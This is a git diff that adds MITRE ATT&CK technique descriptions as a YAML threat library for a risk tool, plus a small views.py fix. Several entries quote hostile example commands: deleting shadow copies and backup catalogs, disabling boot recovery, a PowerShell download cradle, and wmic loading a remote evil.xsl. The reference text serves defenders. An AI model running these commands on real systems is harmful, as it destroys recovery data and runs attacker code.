security context from the administrator level to the SYSTEM level. An + adversary can then use a token to authenticate to a remote system as the account + for that token if the account has appropriate permissions on the remote system.(Citation: + Pentestlab Token Manipulation) + + + Any standard user can use the runas command, and the Windows API + functions, to create impersonation tokens; it does not require access to an + administrator account. There are also other mechanisms, such as Active Directory + fields, that can be used to modify access tokens. + + https://attack.mitre.org/techniques/T1134' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1111 + name: T1111 - Multi-Factor Authentication Interception + provider: MITRE ATT&CK + description: "Adversaries may target multi-factor authentication (MFA) mechanisms,\ + \ (i.e., smart cards, token generators, etc.) to gain access to credentials\ + \ that can be used to access systems, services, and network resources. Use of\ + \ MFA is recommended and provides a higher level of security than usernames\ + \ and passwords alone, but organizations should be aware of techniques that\ + \ could be used to intercept and bypass these security mechanisms. \n\nIf a\ + \ smart card is used for multi-factor authentication, then a keylogger will\ + \ need to be used to obtain the password associated with a smart card during\ + \ normal use. With both an inserted card and access to the smart card password,\ + \ an adversary can connect to a network resource using the infected system to\ + \ proxy the authentication with the inserted hardware token. (Citation: Mandiant\ + \ M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target\ + \ other hardware tokens, such as RSA SecurID. Capturing token input (including\ + \ a user's personal identification code) may provide temporary access (i.e.\ + \ replay the one-time passcode until the next value rollover) as well as possibly\ + \ enabling adversaries to reliably predict future authentication values (given\ + \ access to both the algorithm and any seed values used to generate appended\ + \ temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may\ + \ be intercepted and used by an adversary to authenticate. It is common for\ + \ one-time codes to be sent via out-of-band communications (email, SMS). If\ + \ the device and/or service is not secured, then it may be vulnerable to interception.\ + \ Service providers can also be targeted: for example, an adversary may compromise\ + \ an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation:\ + \ Okta Scatter Swine 2022)\nhttps://attack.mitre.org/techniques/T1111" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1136 + name: T1136 - Create Account + provider: MITRE ATT&CK + description: 'Adversaries may create an account to maintain access to victim systems. + With a sufficient level of access, creating such accounts may be used to establish + secondary credentialed access that do not require persistent remote access tools + to be deployed on the system. + + + Accounts may be created on the local system or within a domain or cloud tenant. + In cloud environments, adversaries may create accounts that only have access + to specific services, which can reduce the chance of detection. + + https://attack.mitre.org/techniques/T1136' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1526 + name: T1526 - Cloud Service Discovery + provider: MITRE ATT&CK + description: 'An adversary may attempt to enumerate the cloud services running + on a system after gaining access. These methods can differ from platform-as-a-service + (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). + Many services exist throughout the various cloud providers and can include Continuous + Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. + They may also include security services, such as AWS GuardDuty and Microsoft + Defender for Cloud, and logging services, such as AWS CloudTrail and Google + Cloud Audit Logs. + + + Adversaries may attempt to discover information about the services enabled throughout + the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure + Resource Manager API, can enumerate resources and services, including applications, + management groups, resources and policy definitions, and their relationships + that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: + Azure AD Graph API) + + + For example, Stormspotter is an open source tool for enumerating and constructing + a graph for Azure resources and services, and Pacu is an open source AWS exploitation + framework that supports several methods for discovering cloud services.(Citation: + Azure - Stormspotter)(Citation: GitHub Pacu) + + + Adversaries may use the information gained to shape follow-on behaviors, such + as targeting data or credentials from enumerated services or evading identified + defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) + or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008). + + https://attack.mitre.org/techniques/T1526' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1018 + name: T1018 - Remote System Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to get a listing of other systems by IP + address, hostname, or other logical identifier on a network that may be used + for Lateral Movement from the current system. Functionality could exist within + remote access tools to enable this, but utilities available on the operating + system could also be used such as [Ping](https://attack.mitre.org/software/S0097) + or net view using [Net](https://attack.mitre.org/software/S0039). + + + Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts + or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) + cache entries) in order to discover the presence of remote systems in an environment. + + + Adversaries may also target discovery of network infrastructure as well as leverage + [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands + on network devices to gather detailed information about systems within a network + (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: + CISA AR21-126A FIVEHANDS May 2021) + + https://attack.mitre.org/techniques/T1018' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1046 + name: T1046 - Network Service Discovery + provider: MITRE ATT&CK + description: "Adversaries may attempt to get a listing of services running on\ + \ remote hosts and local network infrastructure devices, including those that\ + \ may be vulnerable to remote software exploitation. Common methods to acquire\ + \ this information include port and/or vulnerability scans using tools that\ + \ are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021) \ + \ \n\nWithin cloud environments, adversaries may attempt to discover services\ + \ running on other cloud hosts. Additionally, if the cloud environment is connected\ + \ to a on-premises environment, adversaries may be able to identify services\ + \ running on non-cloud systems as well.\n\nWithin macOS environments, adversaries\ + \ may use the native Bonjour application to discover services running on other\ + \ macOS hosts within a network. The Bonjour mDNSResponder daemon automatically\ + \ registers and advertises a host\u2019s registered services on the network.\ + \ For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp\ + \ .) to find other systems broadcasting the ssh service.(Citation: apple\ + \ doco bonjour description)(Citation: macOS APT Activity Bradley)\nhttps://attack.mitre.org/techniques/T1046" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1518 + name: T1518 - Software Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to get a listing of software and software + versions that are installed on a system or in a cloud environment. Adversaries + may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + + Adversaries may attempt to enumerate software for a variety of reasons, such + as figuring out what security measures are present or if the compromised system + has a version of software that is vulnerable to [Exploitation for Privilege + Escalation](https://attack.mitre.org/techniques/T1068). + + https://attack.mitre.org/techniques/T1518' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1538 + name: T1538 - Cloud Service Dashboard + provider: MITRE ATT&CK + description: 'An adversary may use a cloud service dashboard GUI with stolen credentials + to gain useful information from an operational cloud environment, such as specific + services, resources, and features. For example, the GCP Command Center can be + used to view all assets, findings of potential security risks, and to run additional + queries, such as finding public IP addresses and open ports.(Citation: Google + Command Center Dashboard) + + + Depending on the configuration of the environment, an adversary may be able + to enumerate more information via the graphical dashboard than an API. This + allows the adversary to gain information without making any API requests. + + https://attack.mitre.org/techniques/T1538' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1622 + name: T1622 - Debugger Evasion + provider: MITRE ATT&CK + description: "Adversaries may employ various means to detect and avoid debuggers.\ + \ Debuggers are typically used by defenders to trace and/or analyze the execution\ + \ of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger\ + \ evasion may include changing behaviors based on the results of the checks\ + \ for the presence of artifacts indicative of a debugged environment. Similar\ + \ to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497),\ + \ if the adversary detects a debugger, they may alter their malware to disengage\ + \ from the victim or conceal the core functions of the implant. They may also\ + \ search for debugger artifacts before dropping secondary or additional payloads.\n\ + \nSpecific checks will vary based on the target and/or adversary, but may involve\ + \ [Native API](https://attack.mitre.org/techniques/T1106) function calls such\ + \ as IsDebuggerPresent() and NtQueryInformationProcess(),\ + \ or manually checking the BeingDebugged flag of the Process Environment\ + \ Block (PEB). Other checks for debugging artifacts may also seek to enumerate\ + \ hardware breakpoints, interrupt assembly opcodes, time checks, or measurements\ + \ if exceptions are raised in the current process (assuming a present debugger\ + \ would \u201Cswallow\u201D or handle the potential error).(Citation: hasherezade\ + \ debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nAdversaries\ + \ may use the information learned from these debugger checks during automated\ + \ discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching\ + \ the process or flooding debug logs with meaningless data via messages produced\ + \ by looping [Native API](https://attack.mitre.org/techniques/T1106) function\ + \ calls such as OutputDebugStringW().(Citation: wardle evilquest\ + \ partii)(Citation: Checkpoint Dridex Jan 2021)\nhttps://attack.mitre.org/techniques/T1622" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1052 + name: T1052 - Exfiltration Over Physical Medium + provider: MITRE ATT&CK + description: 'Adversaries may attempt to exfiltrate data via a physical medium, + such as a removable drive. In certain circumstances, such as an air-gapped network + compromise, exfiltration could occur via a physical medium or device introduced + by a user. Such media could be an external hard drive, USB drive, cellular phone, + MP3 player, or other removable storage and processing device. The physical medium + or device could be used as the final exfiltration point or to hop between otherwise + disconnected systems. + + https://attack.mitre.org/techniques/T1052' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1105 + name: T1105 - Ingress Tool Transfer + provider: MITRE ATT&CK + description: "Adversaries may transfer tools or other files from an external system\ + \ into a compromised environment. Tools or files may be copied from an external\ + \ adversary-controlled system to the victim network through the command and\ + \ control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095).\ + \ Once present, adversaries may also transfer/spread tools between victim devices\ + \ within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).\ + \ \n\nOn Windows, adversaries may use various utilities to download tools, such\ + \ as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160),\ + \ and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such\ + \ as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest.\ + \ On Linux and macOS systems, a variety of utilities also exist, such as `curl`,\ + \ `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)\n\ + \nAdversaries may also abuse installers and package managers, such as `yum`\ + \ or `winget`, to download tools to victim hosts.\n\nFiles can also be transferred\ + \ using various [Web Service](https://attack.mitre.org/techniques/T1102)s as\ + \ well as native or otherwise present tools on the victim system.(Citation:\ + \ PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage\ + \ services that sync between a web-based and an on-premises client, such as\ + \ Dropbox or OneDrive, to transfer files onto victim systems. For example, by\ + \ compromising a cloud account and logging into the service's web portal, an\ + \ adversary may be able to trigger an automatic syncing process that transfers\ + \ the file onto the victim's machine.(Citation: Dropbox Malware Sync)\nhttps://attack.mitre.org/techniques/T1105" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1648 + name: T1648 - Serverless Execution + provider: MITRE ATT&CK + description: "Adversaries may abuse serverless computing, integration, and automation\ + \ services to execute arbitrary code in cloud environments. Many cloud providers\ + \ offer a variety of serverless resources, including compute engines, application\ + \ integration services, and web servers. \n\nAdversaries may abuse these resources\ + \ in various ways as a means of executing arbitrary commands. For example, adversaries\ + \ may use serverless functions to execute malicious code, such as crypto-mining\ + \ malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation:\ + \ Cado Security Denonia) Adversaries may also create functions that enable further\ + \ compromise of the cloud environment. For example, an adversary may use the\ + \ `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission\ + \ in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)\ + \ to a serverless cloud function, which may then be able to perform actions\ + \ the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation:\ + \ Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can\ + \ also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)),\ + \ potentially enabling persistent execution over time. For example, in AWS environments,\ + \ an adversary may create a Lambda function that automatically adds [Additional\ + \ Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user\ + \ and a corresponding CloudWatch events rule that invokes that function whenever\ + \ a new user is created.(Citation: Backdooring an AWS account) Similarly, an\ + \ adversary may create a Power Automate workflow in Office 365 environments\ + \ that forwards all emails a user receives or creates anonymous sharing links\ + \ whenever a user is granted access to a document in SharePoint.(Citation: Varonis\ + \ Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\n\ + https://attack.mitre.org/techniques/T1648" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1653 + name: T1653 - Power Settings + provider: MITRE ATT&CK + description: 'Adversaries may impair a system''s ability to hibernate, reboot, + or shut down in order to extend access to infected machines. When a computer + enters a dormant state, some or all software and hardware may cease to operate + which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate) + + + Adversaries may abuse system utilities and configuration settings to maintain + access by preventing machines from entering a state, such as standby, that can + terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: + systemdsleep Linux) + + + For example, `powercfg` controls all configurable power system settings on a + Windows system and can be abused to prevent an infected host from locking or + shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android + Users) Adversaries may also extend system lock screen timeout settings.(Citation: + BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as + disk and hibernate timeout, can be similarly abused to keep the infected machine + running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware + Loader Campaign) + + + Aware that some malware cannot survive system reboots, adversaries may entirely + delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries) + + https://attack.mitre.org/techniques/T1653' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1484 + name: T1484 - Domain Policy Modification + provider: MITRE ATT&CK + description: 'Adversaries may modify the configuration settings of a domain to + evade defenses and/or escalate privileges in domain environments. Domains provide + a centralized means of managing how computer resources (ex: computers, user + accounts) can act, and interact with each other, on a network. The policy of + the domain also includes configuration settings that may apply between domains + in a multi-domain/forest environment. Modifications to domain settings may include + altering domain Group Policy Objects (GPOs) or changing trust settings for domains, + including federation trusts. + + + With sufficient permissions, adversaries can modify domain policy settings. + Since domain configuration settings control many of the interactions within + the Active Directory (AD) environment, there are a great number of potential + attacks that can stem from this abuse. Examples of such abuse include modifying + GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) + to computers throughout the domain environment(Citation: ADSecurity GPO Persistence + 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) + or modifying domain trusts to include an adversary controlled domain where they + can control access tokens that will subsequently be accepted by victim domain + resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber + Attacks) Adversaries can also change configuration settings within the AD environment + to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). + + + Adversaries may temporarily modify domain policy, carry out a malicious action(s), + and then revert the change to remove suspicious indicators. + + https://attack.mitre.org/techniques/T1484' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1220 + name: T1220 - XSL Script Processing + provider: MITRE ATT&CK + description: "Adversaries may bypass application control and obscure execution\ + \ of code by embedding scripts inside XSL files. Extensible Stylesheet Language\ + \ (XSL) files are commonly used to describe the processing and rendering of\ + \ data within XML files. To support complex operations, the XSL standard includes\ + \ support for embedded scripting in various languages. (Citation: Microsoft\ + \ XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute\ + \ arbitrary files while potentially bypassing application control. Similar to\ + \ [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127),\ + \ the Microsoft common line transformation utility binary (msxsl.exe) (Citation:\ + \ Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript\ + \ embedded within local or remote (URL referenced) XSL files. (Citation: Penetration\ + \ Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default,\ + \ an adversary will likely need to package it with dropped files. (Citation:\ + \ Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an\ + \ XML source file and an XSL stylesheet. Since the XSL file is valid XML, the\ + \ adversary may call the same XSL file twice. When using msxsl.exe adversaries\ + \ may also give the XML/XSL files an arbitrary file extension.(Citation: XSL\ + \ Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab\ + \ MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml\ + \ script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n\ + * msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of\ + \ this technique, dubbed \u201CSquiblytwo\u201D, involves using [Windows Management\ + \ Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript\ + \ or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can\ + \ also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/\ + \ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries\ + \ may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)\ + \ provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\ + \nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\ + \n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote\ + \ File: wmic os get /FORMAT:\u201Dhttps[:]//example[.]com/evil[.]xsl\u201D\ + \nhttps://attack.mitre.org/techniques/T1220" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1587 + name: T1587 - Develop Capabilities + provider: MITRE ATT&CK + description: 'Adversaries may build capabilities that can be used during targeting. + Rather than purchasing, freely downloading, or stealing capabilities, adversaries + may develop their own capabilities in-house. This is the process of identifying + development requirements and building solutions such as malware, exploits, and + self-signed certificates. Adversaries may develop capabilities to support their + operations throughout numerous phases of the adversary lifecycle.(Citation: + Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity + June 2020)(Citation: Talos Promethium June 2020) + + + As with legitimate development efforts, different skill sets may be required + for developing capabilities. The skills needed may be located in-house, or may + need to be contracted out. Use of a contractor may be considered an extension + of that adversary''s development capabilities, provided the adversary plays + a role in shaping requirements and maintains a degree of exclusivity to the + capability. + + https://attack.mitre.org/techniques/T1587' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1008 + name: T1008 - Fallback Channels + provider: MITRE ATT&CK + description: 'Adversaries may use fallback or alternate communication channels + if the primary channel is compromised or inaccessible in order to maintain reliable + command and control and to avoid data transfer thresholds. + + https://attack.mitre.org/techniques/T1008' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1124 + name: T1124 - System Time Discovery + provider: MITRE ATT&CK + description: 'An adversary may gather the system time and/or time zone from a + local or remote system. The system time is set and stored by the Windows Time + Service within a domain to maintain time synchronization between systems and + services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet + Windows Time Service) + + + System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) + on Windows by performing net time \\hostname to gather the system + time on a remote system. The victim''s time zone may also be inferred from the + current system time or gathered by using w32tm /tz.(Citation: Technet + Windows Time Service) + + + On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + commands such as `show clock detail` can be used to see the current time configuration.(Citation: + show_clock_detail_cisco_cmd) + + + This information could be useful for performing other techniques, such as executing + a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: + RSA EU12 They''re Inside), or to discover locality information based on time + zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). + Adversaries may also use knowledge of system time as part of a time bomb, or + delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) + + https://attack.mitre.org/techniques/T1124' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1556 + name: T1556 - Modify Authentication Process + provider: MITRE ATT&CK + description: 'Adversaries may modify authentication mechanisms and processes to + access user credentials or enable otherwise unwarranted access to accounts. + The authentication process is handled by mechanisms, such as the Local Security + Authentication Server (LSASS) process and the Security Accounts Manager (SAM) + on Windows, pluggable authentication modules (PAM) on Unix-based systems, and + authorization plugins on MacOS systems, responsible for gathering, storing, + and validating credentials. By modifying an authentication process, an adversary + may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + + Adversaries may maliciously modify a part of this process to either reveal credentials + or bypass authentication mechanisms. Compromised credentials or access may be + used to bypass access controls placed on various resources on systems within + the network and may even be used for persistent access to remote systems and + externally available services, such as VPNs, Outlook Web Access and remote desktop. + + https://attack.mitre.org/techniques/T1556' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1495 + name: T1495 - Firmware Corruption + provider: MITRE ATT&CK + description: 'Adversaries may overwrite or corrupt the flash memory contents of + system BIOS or other firmware in devices attached to a system in order to render + them inoperable or unable to boot, thus denying the availability to use the + devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is + software that is loaded and executed from non-volatile memory on hardware devices + in order to initialize and manage device functionality. These devices may include + the motherboard, hard drive, or video cards. + + + In general, adversaries may manipulate, overwrite, or corrupt firmware in order + to deny the use of the system or devices. For example, corruption of firmware + responsible for loading the operating system for network devices may render + the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: + cisa_malware_orgs_ukraine) Depending on the device, this attack may also result + in [Data Destruction](https://attack.mitre.org/techniques/T1485). + + https://attack.mitre.org/techniques/T1495' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1490 + name: T1490 - Inhibit System Recovery + provider: MITRE ATT&CK + description: "Adversaries may delete or remove built-in data and turn off services\ + \ designed to aid in the recovery of a corrupted system to prevent recovery.(Citation:\ + \ Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny\ + \ access to available backups and recovery options.\n\nOperating systems may\ + \ contain features that can help fix corrupted systems, such as a backup catalog,\ + \ volume shadow copies, and automatic repair features. Adversaries may disable\ + \ or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485)\ + \ and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation:\ + \ Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore,\ + \ adversaries may disable recovery notifications, then corrupt backups.(Citation:\ + \ disable_notif_synology_ransom)\n\nA number of native Windows utilities have\ + \ been used by adversaries to disable or delete system recovery features:\n\n\ + * vssadmin.exe can be used to delete all volume shadow copies on\ + \ a system - vssadmin.exe delete shadows /all /quiet\n* [Windows\ + \ Management Instrumentation](https://attack.mitre.org/techniques/T1047) can\ + \ be used to delete volume shadow copies - wmic shadowcopy delete\n\ + * wbadmin.exe can be used to delete the Windows Backup Catalog\ + \ - wbadmin.exe delete catalog -quiet\n* bcdedit.exe\ + \ can be used to disable automatic Windows recovery features by modifying boot\ + \ configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\ + \ & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe\ + \ can be used to disable Windows Recovery Environment (WinRE) repair/recovery\ + \ options of an infected system\n\nOn network devices, adversaries may leverage\ + \ [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware\ + \ images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529)\ + \ to reload the device. Together this activity may leave network devices completely\ + \ inoperable and inhibit recovery operations.\n\nAdversaries may also delete\ + \ \u201Conline\u201D backups that are connected to their network \u2013 whether\ + \ via network storage media or through folders that sync to cloud services.(Citation:\ + \ ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable\ + \ versioning and backup policies and delete snapshots, machine images, and prior\ + \ versions of objects designed to be used in disaster recovery scenarios.(Citation:\ + \ Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3\ + \ Ransomware)\nhttps://attack.mitre.org/techniques/T1490" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1216 + name: T1216 - System Script Proxy Execution + provider: MITRE ATT&CK + description: 'Adversaries may use trusted scripts, often signed with certificates, + to proxy the execution of malicious files. Several Microsoft signed scripts + that have been downloaded from Microsoft or are default on Windows installations + can be used to proxy execution of other files.(Citation: LOLBAS Project) This + behavior may be abused by adversaries to execute malicious files that could + bypass application control and signature validation on systems.(Citation: GitHub + Ultimate AppLocker Bypass List) + + https://attack.mitre.org/techniques/T1216' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1211 + name: T1211 - Exploitation for Defense Evasion + provider: MITRE ATT&CK + description: "Adversaries may exploit a system or application vulnerability to\ + \ bypass security features. Exploitation of a vulnerability occurs when an adversary\ + \ takes advantage of a programming error in a program, service, or within the\ + \ operating system software or kernel itself to execute adversary-controlled\ + \ code.\_Vulnerabilities may exist in defensive security software that can be\ + \ used to disable or circumvent them.\n\nAdversaries may have prior knowledge\ + \ through reconnaissance that security software exists within an environment\ + \ or they may perform checks during or shortly after the system is compromised\ + \ for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001).\ + \ The security software will likely be targeted directly for exploitation. There\ + \ are examples of antivirus software being targeted by persistent threat groups\ + \ to avoid detection.\n\nThere have also been examples of vulnerabilities in\ + \ public cloud infrastructure of SaaS applications that may bypass defense boundaries\ + \ (Citation: Salesforce zero-day in facebook phishing attack), evade security\ + \ logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden\ + \ infrastructure.(Citation: GhostToken GCP flaw)\nhttps://attack.mitre.org/techniques/T1211" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1127 + name: T1127 - Trusted Developer Utilities Proxy Execution + provider: MITRE ATT&CK + description: 'Adversaries may take advantage of trusted developer utilities to + proxy execution of malicious payloads. There are many utilities used for software + development related tasks that can be used to execute code in various forms + to assist in development, debugging, and reverse engineering.(Citation: engima0x3 + DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: + LOLBAS Tracker) These utilities may often be signed with legitimate certificates + that allow them to execute on a system and proxy execution of malicious code + through a trusted process that effectively bypasses application control solutions. + + https://attack.mitre.org/techniques/T1127' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1529 + name: T1529 - System Shutdown/Reboot + provider: MITRE ATT&CK + description: 'Adversaries may shutdown/reboot systems to interrupt access to, + or aid in the destruction of, those systems. Operating systems may contain commands + to initiate a shutdown/reboot of a machine or network device. In some cases, + these commands may also be used to initiate a shutdown/reboot of a remote computer + or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: + alert_TA18_106A) + + + Shutting down or rebooting systems may disrupt access to computer resources + for legitimate users while also impeding incident response/recovery. + + + Adversaries may attempt to shutdown/reboot a system after impacting it in other + ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) + or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to + hasten the intended effects on system availability.(Citation: Talos Nyetya June + 2017)(Citation: Talos Olympic Destroyer 2018) + + https://attack.mitre.org/techniques/T1529' + version: '1.0' diff --git a/library/views.py b/library/views.py index 4d013c2..d7c32d0 100644 --- a/library/views.py +++ b/library/views.py @@ -29,7 +29,7 @@ class LibraryListView(BaseContextMixin, FormView): def get_queryset(self): qs = get_available_libraries() for lib in qs: - lib['requirements'] = len(lib['objects'].get('framework').get('requirements')) if lib['objects'].get('framework').get('requirements') else 0 + lib['requirements'] = len(lib['objects'].get('framework').get('requirements')) if lib['objects'].get('framework') else 0 lib['threats'] = len(lib['objects'].get('threats')) if lib['objects'].get('threats') else 0 lib['security_functions'] = len(lib['objects'].get('security_functions')) if lib['objects'].get('security_functions') else 0 lib['objects'].clear()